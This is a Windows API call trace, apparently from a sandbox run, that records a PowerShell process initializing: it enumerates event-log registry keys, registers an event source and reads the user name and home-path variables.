	[0847.184] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.184] CoTaskMemFree (pv=0x269740) 
	[0847.184] CoTaskMemFree (pv=0x0) 
	[0847.184] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x354) returned 0x0
	[0847.184] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.184] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x358) returned 0x0
	[0847.184] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.185] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x35c) returned 0x0
	[0847.185] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.185] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x360) returned 0x0
	[0847.185] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.185] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x364) returned 0x0
	[0847.185] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.185] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x368) returned 0x0
	[0847.185] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.186] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x36c) returned 0x0
	[0847.186] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.186] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x370) returned 0x0
	[0847.186] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.186] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x374) returned 0x0
	[0847.186] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x378) returned 0x0
	[0847.186] RegCloseKey (hKey=0x378) returned 0x0
	[0847.186] RegCloseKey (hKey=0x350) returned 0x0
	[0847.187] RegCloseKey (hKey=0x374) returned 0x0
	[0847.188] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd528 | out: phkResult=0x1cd528*=0x374) returned 0x0
	[0847.188] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd49c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd498, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd49c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd498*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.188] CoTaskMemFree (pv=0x0) 
	[0847.188] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.188] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.188] CoTaskMemFree (pv=0x269740) 
	[0847.188] CoTaskMemFree (pv=0x0) 
	[0847.188] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.188] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.188] CoTaskMemFree (pv=0x269740) 
	[0847.188] CoTaskMemFree (pv=0x0) 
	[0847.188] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.188] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.189] CoTaskMemFree (pv=0x269740) 
	[0847.189] CoTaskMemFree (pv=0x0) 
	[0847.189] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.189] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.189] CoTaskMemFree (pv=0x269740) 
	[0847.189] CoTaskMemFree (pv=0x0) 
	[0847.189] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.189] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.189] CoTaskMemFree (pv=0x269740) 
	[0847.189] CoTaskMemFree (pv=0x0) 
	[0847.189] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.189] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.189] CoTaskMemFree (pv=0x269740) 
	[0847.189] CoTaskMemFree (pv=0x0) 
	[0847.190] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.190] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.190] CoTaskMemFree (pv=0x269740) 
	[0847.190] CoTaskMemFree (pv=0x0) 
	[0847.190] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.190] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.190] CoTaskMemFree (pv=0x269740) 
	[0847.190] CoTaskMemFree (pv=0x0) 
	[0847.190] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.190] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.190] CoTaskMemFree (pv=0x269740) 
	[0847.190] CoTaskMemFree (pv=0x0) 
	[0847.190] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x350) returned 0x0
	[0847.190] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.191] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x378) returned 0x0
	[0847.191] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.191] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x37c) returned 0x0
	[0847.191] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.191] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x380) returned 0x0
	[0847.191] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.191] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x384) returned 0x0
	[0847.191] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.192] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x388) returned 0x0
	[0847.192] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.192] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x38c) returned 0x0
	[0847.192] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0847.192] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x390) returned 0x0
	[0848.003] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x0) returned 0x2
	[0848.003] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x394) returned 0x0
	[0848.003] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x398) returned 0x0
	[0848.004] RegCloseKey (hKey=0x398) returned 0x0
	[0848.004] RegCloseKey (hKey=0x374) returned 0x0
	[0848.004] RegCloseKey (hKey=0x394) returned 0x0
	[0848.005] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4f8 | out: phkResult=0x1cd4f8*=0x394) returned 0x0
	[0848.005] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd46c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd468, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd46c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd468*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0848.005] CoTaskMemFree (pv=0x0) 
	[0848.005] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0848.005] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x269740, lpcchName=0x1cd4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0848.006] CoTaskMemFree (pv=0x269740) 
	[0848.006] CoTaskMemFree (pv=0x0) 
	[0848.006] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0848.006] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x269740, lpcchName=0x1cd4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0848.006] CoTaskMemFree (pv=0x269740) 
	[0848.006] CoTaskMemFree (pv=0x0) 
	[0848.006] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0848.006] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x269740, lpcchName=0x1cd4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0848.006] CoTaskMemFree (pv=0x269740) 
	[0848.006] CoTaskMemFree (pv=0x0) 
	[0848.006] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0848.006] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x269740, lpcchName=0x1cd4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0848.006] CoTaskMemFree (pv=0x269740) 
	[0848.006] CoTaskMemFree (pv=0x0) 
	[0848.007] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0848.007] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x269740, lpcchName=0x1cd4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0848.007] CoTaskMemFree (pv=0x269740) 
	[0848.007] CoTaskMemFree (pv=0x0) 
	[0848.007] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0848.007] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x269740, lpcchName=0x1cd4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0848.007] CoTaskMemFree (pv=0x269740) 
	[0848.007] CoTaskMemFree (pv=0x0) 
	[0848.007] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0848.007] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x269740, lpcchName=0x1cd4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0848.007] CoTaskMemFree (pv=0x269740) 
	[0848.007] CoTaskMemFree (pv=0x0) 
	[0848.007] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0848.007] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x269740, lpcchName=0x1cd4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0848.008] CoTaskMemFree (pv=0x269740) 
	[0848.008] CoTaskMemFree (pv=0x0) 
	[0848.008] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0848.008] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x269740, lpcchName=0x1cd4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0848.008] CoTaskMemFree (pv=0x269740) 
	[0848.008] CoTaskMemFree (pv=0x0) 
	[0848.008] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x374) returned 0x0
	[0848.008] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x0) returned 0x2
	[0848.008] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x398) returned 0x0
	[0848.008] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x0) returned 0x2
	[0848.008] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x39c) returned 0x0
	[0848.009] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x0) returned 0x2
	[0848.009] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x3a0) returned 0x0
	[0848.009] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x0) returned 0x2
	[0848.009] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x3a4) returned 0x0
	[0848.009] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x0) returned 0x2
	[0848.009] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x3a8) returned 0x0
	[0848.009] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x0) returned 0x2
	[0848.010] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x3ac) returned 0x0
	[0848.010] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x0) returned 0x2
	[0848.010] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x3b0) returned 0x0
	[0848.010] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x0) returned 0x2
	[0848.010] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x3b4) returned 0x0
	[0848.010] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd558 | out: phkResult=0x1cd558*=0x3b8) returned 0x0
	[0848.010] RegCloseKey (hKey=0x3b8) returned 0x0
	[0848.011] RegCloseKey (hKey=0x394) returned 0x0
	[0848.011] RegCloseKey (hKey=0x3b4) returned 0x0
	[0848.019] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b9d0008
	[0848.990] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x302d5e0*="WSMan", lpRawData=0x302d350) returned 1
	[0848.991] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0848.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.991] CoTaskMemFree (pv=0x2d4f30) 
	[0848.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0848.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0848.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0848.994] CoTaskMemAlloc (cb=0x804) returned 0x1b905360
	[0848.994] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b905360, nSize=0x1cd7e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd7e8) returned 0x1
	[0848.994] CoTaskMemFree (pv=0x1b905360) 
	[0848.994] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0848.994] GetUserNameW (in: lpBuffer=0x269740, pcbBuffer=0x1cd828 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd828) returned 1
	[0848.994] CoTaskMemFree (pv=0x269740) 
	[0848.995] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3032b18*="Alias", lpRawData=0x30328a8) returned 1
	[0848.996] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0848.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.996] CoTaskMemFree (pv=0x2d4f30) 
	[0848.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0848.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0848.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0848.998] CoTaskMemAlloc (cb=0x804) returned 0x1b905360
	[0848.998] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b905360, nSize=0x1cd7e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd7e8) returned 0x1
	[0848.999] CoTaskMemFree (pv=0x1b905360) 
	[0848.999] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0848.999] GetUserNameW (in: lpBuffer=0x269740, pcbBuffer=0x1cd828 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd828) returned 1
	[0848.999] CoTaskMemFree (pv=0x269740) 
	[0848.999] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3038110*="Environment", lpRawData=0x3037ea0) returned 1
	[0849.001] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0849.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0849.001] CoTaskMemFree (pv=0x2d4f30) 
	[0849.002] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0849.002] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0849.002] CoTaskMemFree (pv=0x2d4f30) 
	[0849.002] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0849.002] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0849.002] CoTaskMemFree (pv=0x2d4f30) 
	[0849.003] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1cd390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
